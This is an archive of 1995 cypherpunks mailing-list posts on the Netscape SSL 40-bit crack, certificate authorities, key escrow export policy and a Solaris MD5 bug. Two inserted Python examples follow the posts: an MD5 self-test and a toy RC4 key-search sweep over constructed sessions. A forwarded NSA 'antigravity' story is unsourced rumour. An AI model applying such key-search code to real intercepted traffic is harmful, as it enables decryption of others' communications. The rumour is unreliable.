PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adam@bwh.harvard.edu (Adam Shostack)
Date: Fri, 18 Aug 95 14:39:51 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: Netscape security
In-Reply-To: <412tij$704@flop.mcom.com>
Message-ID: <9508182133.AA03147@joplin.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


| > >        There is no word as to how to become a KSA.  Netscape has
| > >ignored the question on several occasions.
| > 
| > I'm fairly sure that I remember Taher saying at the W3C security
| > meeting that they intend to do this, and that hardcoding the CA's
| > into the library was a quick hack.  I also have the impression
| > that they don't know how to do it, but my recollection is fuzzier there.
| 
|   It has been stated publicly several times that we do plan to allow
| user configurable certificate authority and server trust.  A user
| will be able to configure their browser to talk to servers that have
| certificates signed by any CA they choose to trust.

	But I think I can work cheaper than Verisign.  What do I have
to do to get set up as a KCA today?


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Fri, 18 Aug 95 17:40:54 PDT
To: CYPHERPUNKS@toad.com
Subject: Strong encryption for credit cards only
Message-ID: <8AF6450.000300033A.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


H > There are many aspects to privacy beyond credit card numbers.  The bottom


      "Jane goes to dance class Wednesdays from 4:30 to 5:30. And since
     Madame Sophia's School of Dance is just a few blocks away from
     Johnson Elementary, she can walk."

tells that pedophile (and we know that the Internet is just =filled=
with them, thanks to Marty Rimm's Definitive Study on the subject)
exactly where he can lie in wait for his next victim. We need strong
crypto to protect The Children!<tm> from such threats. Hillary and the
rest of the Children's Defense Fund-amentalists should be in the
vanguard of this Just Cause.


 * Encrypted just to pixx off Louis Freeh: mQCNAiqxEn0AAAEEAM0fi4K4+iXI9fV0fz0n
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Fri, 18 Aug 95 16:38:02 PDT
To: cypherpunks@toad.com
Subject: Re: WhiSSLing in the Dark
Message-ID: <v01510104ac5ae1440aac@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


David R. Conrad wrote:
>>Netscape Encrypted Data Cracked
>>
>>Tokyo, Japan, Aug. 18 (NB) -- ...
>>
>>Many companies working on secure transaction systems hope
>>the much more secure 128-bit code version of the system
>>will be available for export eventually. This is said to
>>be almost unbreakable, requiring a trillion times more
>>processing power to crack than the 40-bit version.  ...
>
>Notice how the "over a trillion times more" has devolved into simply "a
>trillion times more" -- and we all know that the former statement was a
>gross underestimate, reminiscent of the claim of "over 3 billion
>combinations" on Ideal's packaging for Rubik's cube.
>
>Of course the real reason the media have standardized on trillian for
>this is that they know it is the biggest number the bulk of their
>audience is familiar with, and that if they said 3e26 or even "three
>times ten to the twenty-sixth power" they would snow most of their
>readers/viewers.  (To be fair, I think the WSJ did say 10^26, with a
>brief explanation of what that meant.  I congratulate them for not
>"talking down" to their readers.)

I talked the guy out of using an analogy with physical key length (the kind
you stick in a door) and he settled on "10^26" rather than a power of 2.
Also, I gave him the relevant names, e-mail addresses, and URL's, but
didn't have any phone numbers.

BTW, in the "cryptography experts and hackers and mathematicians" as well
as the whole "hacker" slant, smells like an editor.


Dietrich J. Kappe | Red Planet    http://www.redweb.com/
Red Planet, L.L.C.|         "Chess Space"              /chess
1-800-RED 0 WEB   |      "MS Access Products"          /cobre
Web Publishing    | E-mail:  RedPlanet@redweb.com







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@it.kth.se>
Date: Fri, 18 Aug 95 09:54:56 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Where is the key cracking farming software?
In-Reply-To: <14470.9508181605@exe.dcs.exeter.ac.uk>
Message-ID: <199508181654.SAA10686@piraya.electrum.kth.se>
MIME-Version: 1.0
Content-Type: text/plain



| Yep there's lots of versions of the brutessl software, ones I know of
| (in no particular order):
| 
| - Damien Doligez wrote one
| - Andrew Roos wrote one (this is the one we're using for the challenge)
| - Eric Young wrote one
| - I wrote one

| I think we're ready to start another challenge, this one a
| collaborative project like the brute rc4 one.  Just need some
| challenges now (asked Hal about this).

I think it is time this kind of software is outlawed! I mean, it is a 
criminal instrument, and the only good it does is to embarrass good
old well-meaning companies trying to make a profit. Besides, the 
customers should know better than to buy stuff over the net! And Netscape
said AS IS all the time, didn't they?

(Just joking! :-))

But seriously, I wonder how long it will take before bruteXXX programs 
will be classified as "criminal instruments"? As well as real good 
random generators, I guess? (I don't think they will outlaw the XOR
op, so to get rid of one-time-pads they have to go for the random gen...)

/Christian





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Lane <grue!blane@eskinews.eskimo.com>
Date: Fri, 18 Aug 95 20:29:55 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Where is the key cracking farming software?
In-Reply-To: <199508180611.CAA11918@bb.hks.net>
Message-ID: <Pine.LNX.3.91.950818185344.11301A-101000@guetech.com>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="Boundary..3932.1071713491.multipart/mixed"

--Boundary..3932.1071713491.multipart/mixed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

On Fri, 18 Aug 1995, Lucky Green wrote:

> With all the talk about cracking SSL, where is the cracking software?
> Somebody just offered me a six Pentium workstation, if I agree to give it a
> "real workout". I'd like to be able to say: "Sure, will do."

  Here's a copy of everything from the webpage explaining the crack.

   Brian

-----------------------------------------------------------------------------
"A little rebellion now and then is a good thing."   |   PGP Key and .plan
 -- President Thomas Jefferson                       | email Subj: blane-info
=============================================================================


--Boundary..3932.1071713491.multipart/mixed
Content-Type: application/octet-stream; name="bin00000.bin"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="bin00000.bin"
Content-Description: "ssl-crack.tar.gz"
--Boundary..3932.1071713491.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 18 Aug 95 16:01:35 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape security
Message-ID: <199508182301.TAA08043@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by altitude@cic.net (Alex Tang) on Fri, 18 Aug  2:52 PM


>It seems that one of the problems with Damien's 
>cracking job was that it  was "not sanctioned".  Look 
>at the WSJ article, they didn't mention his  
>name...they just called him "a hacker".  It shows how 
>public opinion still  sees groups like the cypherpunks 
>as just that, a bunch of punks. 
>
>With some "respected" business on our side, it may make 
>a much bigger  impact (better publicity, better 
>leverage, etc.).


   While the WSJ story mentioned no names, other than the
   esteemed CypherName and our cypheragent who lured the
   reporter, later stories have given individual credit and
   amplified the "mainstream" impact of the cabalistic hacker
   culture crack.

   This segue may be due to the PR-mad corporations and the
   LEA's seeking to profit by the drama given to outsiders to
   get their safety-products approved, to pose themselves as
   being more devoted to the public weal than the devil-
   punks (liars or inadvertent truthsayers?).

   Or, it may just be more interesting (lucrative) to pump
   the outsider, hacker aspect. Reporting on hackerdom has
   been oft used to boost a shrewd wannabe-an-insider's rep in
   the mainstream -- no names now, you know who they are, most
   are doing quite well, Zarathustra bless their complicit
   Guccioni-success.

   So, hackers, punks, cypherpunks, up all night, right, watch
   them come calling for an interview when you misbehave in
   outrageous and wondrous and techno-magical ways. Gotta get
   lurid stories to allure the customer/advertiser/voter.

   Damien, Hal and the SSL-non-anonymous hackers, watch your
   backs, think of Kevin and his oh-so-admiring, trust-me
   provocateurs.

   Just my Time-averse sensor-jigger, sensing threat models.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Fri, 18 Aug 95 16:13:39 PDT
To: cypherpunks@toad.com
Subject: Re: WhiSSLing in the Dark
Message-ID: <199508182312.TAA13928@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




>Netscape Encrypted Data Cracked
>
>Tokyo, Japan, Aug. 18 (NB) -- ...
>
>Many companies working on secure transaction systems hope
>the much more secure 128-bit code version of the system
>will be available for export eventually. This is said to
>be almost unbreakable, requiring a trillion times more
>processing power to crack than the 40-bit version.  ...

Notice how the "over a trillion times more" has devolved into simply "a
trillion times more" -- and we all know that the former statement was a
gross underestimate, reminiscent of the claim of "over 3 billion
combinations" on Ideal's packaging for Rubik's cube.

Of course the real reason the media have standardized on trillion for
this is that they know it is the biggest number the bulk of their
audience is familiar with, and that if they said 3e26 or even "three
times ten to the twenty-sixth power" they would snow most of their
readers/viewers.  (To be fair, I think the WSJ did say 10^26, with a
brief explanation of what that meant.  I congratulate them for not
"talking down" to their readers.)

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 18 Aug 95 20:10:37 PDT
To: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Subject: Re: Certificates/Anonymity/Policy/True Names
Message-ID: <ac5aa46b1e0210041773@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:26 AM 8/19/95, Michael Froomkin wrote:
>Bill Stewart asks what follows from "prohibit".  In the model I am, um,
>hypothesizing, CAs that play by the rules are entitled to certain safe
>harbors shielding them from potential liability (e.g. can't be sued if
>their certificate was used in a transaction that went bad through no
>fault of theirs).   No other behaviour or act is banned, but other,
>private, alternatives may suffer a competitive disadvantage since they
>would lack the certainty that they could not be sued.

Then I suggest you use a different word than "prohibit." To many of us,
this implies illegality, men with guns, early morning raids, and Janet
Reno.

You don't seem to mean this.

By the way, is this really just an exercise, or are you perchance involved
in the goings-on with policy on crypto? (Not making any accusations, just
noting that various crypto policy groups are reported to be meeting...the
National Research Council thing, the key escrow initiatives, etc.)

Encrypting minds want to know.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: michael shiplett <walrus@ans.net>
Date: Fri, 18 Aug 95 17:45:38 PDT
To: cypherpunks@toad.com
Subject: Sun's buggy MD5?
Message-ID: <199508190045.UAA148800@bugsy.aa.ans.net>
MIME-Version: 1.0
Content-Type: text/plain


Here's something fun to do on Solaris 2.3 or 2.4.  Notice the
similarity among the Solaris md5 output. Anyone know why this is?

The Sun service folk weren't able to point me to a Solaris bug-report
email address. I had a similar experience looking through www.sun.com.
Pointers are welcomed.


PROBLEM:
    A program which uses md5 from a dynamically linked
    (or loaded) library and the nsl library is loaded before a
    ``standard'' md5 library will get md5 results different from the
    rest of the non-Solaris world.


NOTES:
    the non-Solaris md5 files are from RFC 1321.

    some test output has been deleted as it does not fit nicely on a
    standard message line.

    solmd5 seems to give slightly different output on different machines
    and greatly different output with different compilers

    the nsl library is required on Solaris 2.4 when using sockets.

    /usr/include/sys/ppp_chap.h includes a slightly modified---mainly
    names---version of md5.h.


% gcc -o md5 mddriver.c md5c.c 
% gcc -o solmd5 mddriver.c -lnsl
% ./md5 -x
MD5 test suite:
MD5 ("") = d41d8cd98f00b204e9800998ecf8427e
MD5 ("a") = 0cc175b9c0f1b6a831c399e269772661
MD5 ("abc") = 900150983cd24fb0d6963f7d28e17f72
MD5 ("message digest") = f96b697d7cb7938d525a2f31aaf161d0
MD5 ("abcdefghijklmnopqrstuvwxyz") = c3fcd3d76192e4007dfb496cca67e13b
MD5 ("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
= d174ab98d277d9f5a5611c2c9f419d9f
% ./solmd5 -x
MD5 test suite:
MD5 ("") =               f00001c0effffba8429b59d50529097c
MD5 ("a") =              f00003c0effffba8aec5fcf4284a8dbe
MD5 ("abc") =            f00005c0effffba896fc8af8ca60a911
MD5 ("message digest") = f00007c0effffba8f373218f317a9558
MD5 ("abcdefghijklmnopqrstuvwxyz") = f00009c0effffba896b4f24acb3f4738
MD5 ("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
= f0000bc0effffba8cef237a614aa457d


michael
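
Added example (not part of the original message): a known-answer self-test is the usual guard against a substituted hash routine like the one reported above. This Python sketch parses `mddriver -x` output, checks each digest against the RFC 1321 values via `hashlib`, and lists the byte positions that never change across inputs; the function names are hypothetical and the transcripts are copied from the message.

```python
import hashlib
import re

# Transcripts copied from the message above (./md5 -x and ./solmd5 -x).
MD5_TRANSCRIPT = '''
MD5 test suite:
MD5 ("") = d41d8cd98f00b204e9800998ecf8427e
MD5 ("a") = 0cc175b9c0f1b6a831c399e269772661
MD5 ("abc") = 900150983cd24fb0d6963f7d28e17f72
MD5 ("message digest") = f96b697d7cb7938d525a2f31aaf161d0
MD5 ("abcdefghijklmnopqrstuvwxyz") = c3fcd3d76192e4007dfb496cca67e13b
MD5 ("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
= d174ab98d277d9f5a5611c2c9f419d9f
'''

SOLMD5_TRANSCRIPT = '''
MD5 test suite:
MD5 ("") =               f00001c0effffba8429b59d50529097c
MD5 ("a") =              f00003c0effffba8aec5fcf4284a8dbe
MD5 ("abc") =            f00005c0effffba896fc8af8ca60a911
MD5 ("message digest") = f00007c0effffba8f373218f317a9558
MD5 ("abcdefghijklmnopqrstuvwxyz") = f00009c0effffba896b4f24acb3f4738
MD5 ("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789")
= f0000bc0effffba8cef237a614aa457d
'''

# \s* also spans the line break mddriver inserts before "=" on long inputs.
ENTRY = re.compile(r'MD5 \("(.*?)"\)\s*=\s*([0-9a-fA-F]{32})')


def parse_mddriver(text):
    """Return [(input string, lowercase hex digest)] from mddriver -x output."""
    return [(m.group(1), m.group(2).lower()) for m in ENTRY.finditer(text)]


def known_answer_failures(text):
    """Return (input, reported, expected) for every digest that is not MD5."""
    failures = []
    for message, reported in parse_mddriver(text):
        expected = hashlib.md5(message.encode("ascii")).hexdigest()
        if reported != expected:
            failures.append((message, reported, expected))
    return failures


def constant_byte_positions(text):
    """Byte offsets (0-15) holding the same value in every reported digest."""
    digests = [bytes.fromhex(d) for _, d in parse_mddriver(text)]
    return [i for i in range(16) if len({d[i] for d in digests}) == 1]


if __name__ == "__main__":
    for name, text in (("md5", MD5_TRANSCRIPT), ("solmd5", SOLMD5_TRANSCRIPT)):
        print(name, "failed vectors:", len(known_answer_failures(text)),
              "constant bytes:", constant_byte_positions(text))
```

Seven of the sixteen bytes are identical in every solmd5 digest, a pattern no working hash produces; a program that runs this check at start-up and refuses to continue on failure turns the silent mismatch into a visible error.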




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 18 Aug 95 18:26:38 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <199508182342.QAA20924@ix7.ix.netcom.com>
Message-ID: <Pine.3.89.9508182137.A620886391-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart asks what follows from "prohibit".  In the model I am, um, 
hypothesizing, CAs that play by the rules are entitled to certain safe 
harbors shielding them from potential liability (e.g. can't be sued if 
their certificate was used in a transaction that went bad through no 
fault of theirs).   No other behaviour or act is banned, but other, 
private, alternatives may suffer a competitive disadvantage since they 
would lack the certainty that they could not be sued.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 18 Aug 95 18:29:00 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Certificates/Anonymity/Policy/True Names
In-Reply-To: <ac5a50771d0210045def@[205.199.118.202]>
Message-ID: <Pine.3.89.9508182135.A620886391-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim May says that having govt == root is a step down the slippery slope.
If we say that others can set themselves up as root too, and that
web-of-trust is not prohibited, but that CAs which take part in the
govt-as-root hierarchy get some advantages (liability caps, primarily),
what are the dangers? 

National ID cards is one possibility (key becomes a functional ID).
Others?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Fri, 18 Aug 95 18:32:03 PDT
To: Howard Cheng <howard@cs.ualberta.ca>
Subject: Re: Economic Model for Key Cracking
In-Reply-To: <95Aug18.162938-0600_mdt.13069-7+113@scapa.cs.ualberta.ca>
Message-ID: <Pine.3.89.9508182136.A620886391-0100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


Didn't Ross Perot make his fortune by running data processing tasks nights 
and weekends on machines he leased to other people (all legal)?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See http://www-swiss.ai.mit.edu/6095/articles/froomkin-metaphor/text.html
and http://www.law.cornell.edu/jol/froomkin.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Fri, 18 Aug 95 13:08:16 PDT
To: cypherpunks@toad.com
Subject: Re: Exportable if Escrowed Changes Nothing!
Message-ID: <199508181945.VAA26128@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Joey Grasty writes:
 > Governments:  can't live with 'em, can't shoot 'em.
                                      ^^^^^^^^^^^^^^^

It is precisely this kind of self-defeating pessimism that has allowed
the current state of affairs to develop.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 18 Aug 95 21:38:55 PDT
To: cypherpunks@toad.com
Subject: Perot and Scrap Cycles
Message-ID: <ac5aa76b1f021004cbdc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:31 AM 8/19/95, Michael Froomkin wrote:
>Didn't Ross Perot make his fortune by running data processing tasks nights
>and weekends on machines he leased to other people (all legal)?

I hadn't heard this.

And until I hear more details, I'm skeptical.

(Trivia sidenote: I was in high school in 1970 and met Ross Perot at a
shindig in Dallas--his wife picked me up at the airport and drove me to the
hotel. He had just that spring lost a billion dollars in a single day, due
to a glitch in EDS stock. A billion dollars in 1970 was a lot of money.)

Now in 1970 EDS was indeed leasing lots of IBM mainframes to customers, and
running them. Also, doing processing jobs.

But how many IBM mainframes were idle at night? Not many. This was the day
of multimillion dollar mainframes and programmers making $10,000 a year to
keep them busy at all times.

So, I doubt the machines were idle in the same way our workstations and PCs
are largely idle (obviously, machines now cost less $2000-6000, and
programmers make 10-20 times that...the tables have turned).

I don't discount the possibility that EDS made a deal on the lease rates. I
haven't read up on EDS in this era. I just know that Perot wasn't using
"scrap cycles" (to use Doug Barnes' term), because there probably weren't
many of them.

But I'd like to hear the details.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Fri, 18 Aug 95 18:51:29 PDT
To: cypherpunks@toad.com
Subject: Re: Exportable if Escrowed Changes Nothing!
Message-ID: <199508190150.VAA39657@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> Joey Grasty writes:
>  > Governments:  can't live with 'em, can't shoot 'em.
>                                       ^^^^^^^^^^^^^^^
> 
> It is precisely this kind of self-defeating pessimism that has allowed
> the current state of affairs to develop.
> 
> 

You grossly misinterpreted my remark.  I believe that socialist-statism
exhibited by the current US gov't is about to crack due to overspending
and technology.  Whether it will go peacefully or not is another question.
I stand ready to defend myself if necessary, but I prefer to kick the
statists in the ass by deploying strong encryption.  When information
can flow, the statists lose.  They know that; witness the frantic effort
to outlaw encryption.  Too late, though.

I'm writing code to hasten the end of the statists.  Just what are you 
doing besides hiding behind anonymity?

Regards,

--
Joey Grasty
jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty@pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is,
of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 18 Aug 95 21:59:48 PDT
To: cypherpunks@toad.com
Subject: Vacation
Message-ID: <199508190458.VAA16245@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to be bugging out at such an interesting time, but I will be on
vacation from Aug 19 through Aug 26.  Hope to see a lot of CPs at
Crypto -

Hal Finney




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 18 Aug 95 22:47:18 PDT
To: cypherpunks@toad.com
Subject: NSA into antigravity?
Message-ID: <199508190533.WAA14801@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



this apparently involves credible researchers, and it's something 
that would be pretty bizarre if the NSA is really implicated..

------- Forwarded Message

Date: Fri, 18 Aug 95 18:04:09 -0700
From: Albert Nanomius <nanomius@netcom.com>


- ------- Forwarded Message

Date:  Thu, 17 Aug 1995 17:03:00 -0500 
From: "chris (c.) currivan" <currivan@bnr.ca>
To: snet-l@world.std.com
Subject:  NSA and science 

A post from alt.conspiracy:

Francis E. Decstation <fed@cca.org> wrote:
>
>On July 19, Gerald Ollman and Robert Wayne, two researchers from the
>University of Maryland geophysics department were detained in Fort Meade,
>Maryland, apparently by agents of the National Security Agency, whilst
>taking measurements of the Earth's gravitational field. After 18 hours of
>questioning, they were released after being instructed not to discuss the
>incident. Their equipment and results were not returned.
>
>Neither the University nor the NSA has commented on the incident. However,
>it is believed that Ollman and Wayne were investigating a slight anomaly
>in the Earth's gravitational field centered around Fort Meade. No reason has
>been given for their detention.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Fri, 18 Aug 95 19:42:20 PDT
To: cypherpunks@toad.com
Subject: Time-memory tradeoff in SSL's RC4 code?
Message-ID: <01HU8H23AHQQ8ZJ4DW@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 17 Aug 1995 08:32:56 -0400
>From: "Perry E. Metzger" <perry@piermont.com>
>Subject: Re: SSL challenge -- broken !

>It has occurred to me that, because the RC4 key crackers spend most of
>their time in key setup, you can crack N SSL sessions that you
>captured in not substantially more time than it took to crack 1. This
>is analogous to the way brute force Unix password file hacking operates.

This would work with straight 40-bit keys, but I believe SSL uses
128-bit keys, and then intentionally leaks 88 bits to comply with
export requirements, to prevent this kind of attack from working.

>Perry

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDVGXUHx57Ag8goBAQFyUQP7B7fhKc8AqpcHnQ09ip5gOfy5QMCtGImB
f1Y9lZtAmLFwOIkrfdaL2vCWJKIKc7yg8+FwtmX6Q8yYWH4TdE5eWOGIKSfl5Q8f
etVgF2B49T5Lxxb02ah5cHfO8baOqQOTMkvzQ9bj0XVqAItPoPjDTCOAAegwKZ3V
6L+kZQn89lY=
=KkAX
-----END PGP SIGNATURE-----
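
Added example (not code from the thread): the effect described in the reply above can be measured by counting RC4 key setups. The Python sketch models the key as 88 public bits followed by a 40-bit secret field, shrinks the unknown part to 10 bits so it runs quickly, and uses constructed sessions; SSL's real key derivation is not modelled and all names are hypothetical.

```python
# Constructed model: only the low SECRET_BITS of the 40-bit secret field vary.
SECRET_BITS = 10
KNOWN = 8  # bytes of known keystream available per captured session
SECRETS = [0x155, 0x2AA, 0x03C, 0x3FF]  # constructed per-session secrets


def rc4_keystream(key, n):
    """RC4 key setup (KSA) followed by n bytes of keystream (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def make_sessions(secrets, salted):
    """Constructed sessions as (public key part, known keystream prefix).

    salted=False: straight 40-bit key, nothing public.
    salted=True:  11 public bytes (88 bits), different in every session.
    """
    sessions = []
    for idx, secret in enumerate(secrets):
        public = bytes([idx + 1]) * 11 if salted else b""
        key = public + secret.to_bytes(5, "big")
        sessions.append((public, rc4_keystream(key, KNOWN)))
    return sessions


def sweep(sessions):
    """Exhaust the secret field once over all sessions.

    Returns ({session index: secret}, number of key setups performed).
    A key setup is shared by every session with the same public part, so
    the count shows how much work the batch really costs.
    """
    found, setups = {}, 0
    publics = sorted({public for public, _ in sessions})
    for secret in range(1 << SECRET_BITS):
        tail = secret.to_bytes(5, "big")
        for public in publics:
            stream = rc4_keystream(public + tail, KNOWN)  # one key setup
            setups += 1
            for idx, (pub, known) in enumerate(sessions):
                if pub == public and known == stream:
                    found[idx] = secret
    return found, setups


def compare():
    """Run the same sweep against unsalted and salted session sets."""
    plain = sweep(make_sessions(SECRETS, salted=False))
    salted = sweep(make_sessions(SECRETS, salted=True))
    return plain, salted


if __name__ == "__main__":
    (_, plain_setups), (_, salted_setups) = compare()
    print("key setups, straight 40-bit keys:", plain_setups)
    print("key setups, 88 public bits per session:", salted_setups)
```

With four sessions the unsalted sweep needs 1024 key setups in total, while the salted one needs 4096: the public bits make the work scale with the number of sessions.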




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JMKELSEY@delphi.com
Date: Fri, 18 Aug 95 20:04:12 PDT
To: cypherpunks@toad.com
Subject: Export policy change
Message-ID: <01HU8HT0PYIQ8ZJ4DW@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Thu, 17 Aug 1995 23:48:01 -0400
>From: Rich Salz <rsalz@osf.org>
>Subject: Export policy change

>Just heard on the 11:30pm NPR news update.  The Clinton Administration
>has changed the crypto export policy.  You will now be allowed to
>export strong crypto, provided it is a key escrow system.  The
>reporter (Dan Charles?) said something like anyone can hold the keys,
>as long as they will be made avail when presented with a court order.
>He also said, US citizens will still be able to use strong crypto
>without key escrow internally.  Terrorists and drug pushers were given
>as "reasons."

I think this is an important and somewhat subtle political move on
the part of the administration.  If they can get at least a few
large businesses (the ones who buy into the key-escrow scheme) on
their side, by making it in their economic interests for everyone
to use escrowed crypto, they will have manufactured some
potentially powerful allies in the computer industry.  Certainly,
once any major company has spent a lot of money to set up a key
escrow facility, they will help lobby *against* any easing of the
requirement to use escrowed crypto, based simply on self-interest.

   --John Kelsey, jmkelsey@delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMDVGZUHx57Ag8goBAQEutQQAmM/qEIAlLklDRW/FVvLah7vgY6lYcCK/
XToA79tVZNmy+8U/XjS2g6+Ffsc/gQflOdg/ZmewDOQRJ4YI+BzHUjKL5NVDWAUA
/4+ySWxcAAEOD23GhS9p/iFN/Gbe0oV9JIQ2HCpPN929VaRl7J+1fWA/ETZkB914
ClJPlXqa1xo=
=XefF
-----END PGP SIGNATURE-----




